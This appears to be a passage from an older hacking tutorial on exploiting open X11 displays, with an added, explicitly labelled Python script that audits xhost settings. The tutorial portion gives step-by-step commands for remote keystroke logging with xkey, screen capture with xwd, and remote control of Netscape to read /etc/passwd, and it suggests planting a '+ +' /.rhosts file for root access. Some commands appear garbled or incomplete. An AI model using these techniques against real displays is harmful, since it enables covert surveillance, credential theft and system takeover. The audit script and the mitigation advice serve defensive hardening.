X11 (6000 TCP)

X11 displays are (normally) protected on a network level - that is - there are no usernames and passwords involved. The display is actually a server and it listens on port 6000 (TCP). Control over which clients may connect to the server is provided by the "xhost" command. By default it is set up in a way that nobody can connect to the display - default deny. As soon as programs are sharing the display (exporting an xterm to your display from another host or whatever) the user of the display has to add the IP number or DNS name of the client that wishes to connect by running the command "xhost +hostname". In theory this works perfectly well, but in the real world people tend to just enter "xhost +", which allows anyone to connect to the display.
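The state the paragraph describes can be checked from the display itself: running `xhost` with no arguments prints whether access control is enabled and which hosts are on the allow list. The script below is an added example, not part of the SensePost text; it parses that output and reports whether the display is in the default-deny state, restricted to named hosts, or wide open after an "xhost +". The three xhost outputs are constructed samples, and `workstation.example.invalid` is a placeholder hostname.

```python
"""Check whether an X11 display has been opened to the world with "xhost +".

Added example, not from the SensePost text. Parses the output of a bare
`xhost` call, which reports the display's current access-control state.
"""
import os
import subprocess

ACCESS_ENABLED = "access control enabled"
ACCESS_DISABLED = "access control disabled"

# Constructed xhost outputs for the three states, used for the offline demo.
XHOST_WIDE_OPEN = "access control disabled, clients can connect from any host\n"
XHOST_LOCAL_ONLY = (
    "access control enabled, only authorized clients can connect\n"
    "SI:localuser:alice\n"
)
XHOST_NAMED_HOST = (
    "access control enabled, only authorized clients can connect\n"
    "INET:workstation.example.invalid\n"
    "SI:localuser:alice\n"
)


def parse_xhost(output):
    """Return {'access_control': bool, 'allowed': [entries]} from xhost output."""
    lines = [line.strip() for line in output.splitlines() if line.strip()]
    if not lines:
        raise ValueError("empty xhost output")
    first = lines[0].lower()
    if first.startswith(ACCESS_DISABLED):
        enabled = False
    elif first.startswith(ACCESS_ENABLED):
        enabled = True
    else:
        raise ValueError("unrecognised xhost output: " + lines[0])
    return {"access_control": enabled, "allowed": lines[1:]}


def assess(state):
    """Map the parsed state to (severity, advice)."""
    if not state["access_control"]:
        return ("critical",
                "access control is disabled (someone ran 'xhost +'): any host can "
                "connect, log keystrokes and grab the screen; run 'xhost -' now and "
                "allow specific hosts with 'xhost +hostname'")
    remote = [e for e in state["allowed"] if e.upper().startswith(("INET:", "INET6:"))]
    if remote:
        return ("warning",
                "network hosts allowed: %s; remove any that no longer need the "
                "display with 'xhost -hostname'" % ", ".join(remote))
    return ("ok", "only local entries are allowed")


def audit_display(display=None, run=subprocess.run):
    """Run xhost against a live display and assess the result.

    `run` is injectable so the logic can be exercised without an X server."""
    env = dict(os.environ)
    if display is not None:
        env["DISPLAY"] = display
    completed = run(["xhost"], capture_output=True, text=True, check=True, env=env)
    return assess(parse_xhost(completed.stdout))


if __name__ == "__main__":
    for sample in (XHOST_WIDE_OPEN, XHOST_NAMED_HOST, XHOST_LOCAL_ONLY):
        print(assess(parse_xhost(sample)))
```

Host-based control is coarse even when it is configured correctly: allowing a host admits every user on it. Per-user cookies (xauth) or tunnelling X over SSH, which never exposes port 6000 on the network, are the usual replacements for xhost entries.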

A host that is open for anyone to connect to the display is risking a lot, and could possibly be compromised. There are a few nice things to do when you find an open X11 display. One of the most common attacks is to capture all the keystrokes that are entered on the victim's host. The program "xkey" (available from www.hack.co.za) does this very neatly:

xkey 196.37.xxx.14:0.0
..you wait..time passes...and then:
ssh -l root -<>P 196.37.xxx.1

It's clear why we are excited about key captures. An open X11 display can also be "copied" - the root window (the main window) can be copied and displayed. Each window has a unique ID - you can specify which window you want to copy, but for a start let us get the root window:

xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
xv /tmp/screendump


We are using xv to display the screen - xv can read the xwd format straight off. The screen might include some interesting data - if you get a screensaver - bad luck - use finger to see when someone is active. To get a list of windows that are open on the display you might want to issue the command:
xwininfo -display -all -root | grep \"
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227 +536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks" "Netscape") 872x622+10+10 +10+10


0x300001c " ": ("mozillaComponentBar" "Netscape") 5x5+50+50 +50+50
0x3000001 "Netscape": ("communicator-4.72.bin" "Netscape") 1x1+0+0 +0+0
If the victim is using more than one virtual screen you will be able to see the other screen listed (you won't see it with xwd). With a bit of luck you get a Netscape browser open. To find Netscape open on an open X11 display is very good news, as you can remotely control Netscape. Fancy telling Netscape to open /etc/passwd and doing another screen capture? Here is how:
netscape -display -remote 'openFile(/etc/passwd)'
xwd -display -root -silent -out /tmp/netscape_
xv /tmp/netscape


You can even tell Netscape to write files. Trying to overwrite existing files won't work - you will get a nasty Netscape popup - but you can write files that do not exist. You could create a page with "+ +" on it, redirect the browser to the page, and, if Netscape is running as root, save it to /.rhosts. Be sure to have a close look at http://home.netscape.com/newsref/std/x-remote.html if you find an open X11 running Netscape.

In theory you could also send keystrokes to an open X display. I found the program "xpusher.c" at , fiddled around with it, but it does not seem to work. There might be other programs around.